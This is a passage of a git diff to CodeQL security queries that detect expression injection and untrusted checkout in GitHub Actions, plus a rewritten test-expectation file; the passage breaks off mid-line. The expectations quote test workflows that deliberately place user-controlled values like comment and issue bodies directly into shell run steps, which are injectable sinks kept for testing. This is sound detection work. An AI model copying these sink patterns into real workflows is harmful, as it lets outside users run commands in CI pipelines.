a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0d0bb39c41e..d59cc07cad2 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -38,4 +38,4 @@ from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getRawExpression() + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index db341e0c5cc..865169b3cd9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -19,7 +19,10 @@ import actions * An If node that contains an `actor` check */ class ActorCheck extends If { - ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } + ActorCheck() { + this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") + } } /** @@ -32,7 +35,7 @@ class LabelCheck extends If { } } -from Workflow w, Job job, UsesStep checkoutStep +from Workflow w, LocalJob job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ca481768671..4ef2a2e5875 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,110 +1,21 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -yamlNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | -| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:3:1:3:4 | jobs | -| .github/workflows/test.yml:4:3:4:6 | job1 | -| .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:5:5:11 | runs-on | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | -| .github/workflows/test.yml:8:7:8:16 | job_output | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:9:11:12 | uses | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:15:9:15:12 | name | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | -| .github/workflows/test.yml:16:9:16:10 | id | -| .github/workflows/test.yml:16:13:16:18 | source | -| .github/workflows/test.yml:17:9:17:12 | uses | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | -| .github/workflows/test.yml:19:9:19:12 | name | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | -| .github/workflows/test.yml:20:13:20:16 | step | -| .github/workflows/test.yml:21:9:21:12 | uses | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | -| .github/workflows/test.yml:22:9:22:12 | with | -| .github/workflows/test.yml:23:11:23:16 | source | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:11:25:17 | replace | -| .github/workflows/test.yml:25:20:25:21 | "" | -| .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | -| .github/workflows/test.yml:32:5:32:11 | runs-on | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | -| .github/workflows/test.yml:34:5:34:6 | if | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | -| .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:38:5:38:9 | steps | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -jobNodes +reusableWorkflows +compositeActions +jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -stepNodes +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | @@ -117,17 +28,17 @@ stepNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runExprNodes +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | @@ -142,169 +53,156 @@ runExprNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -allUsesNodes +uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUsesNodes +stepUses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -jobUsesNodes -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesSteps +usesArgs | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | 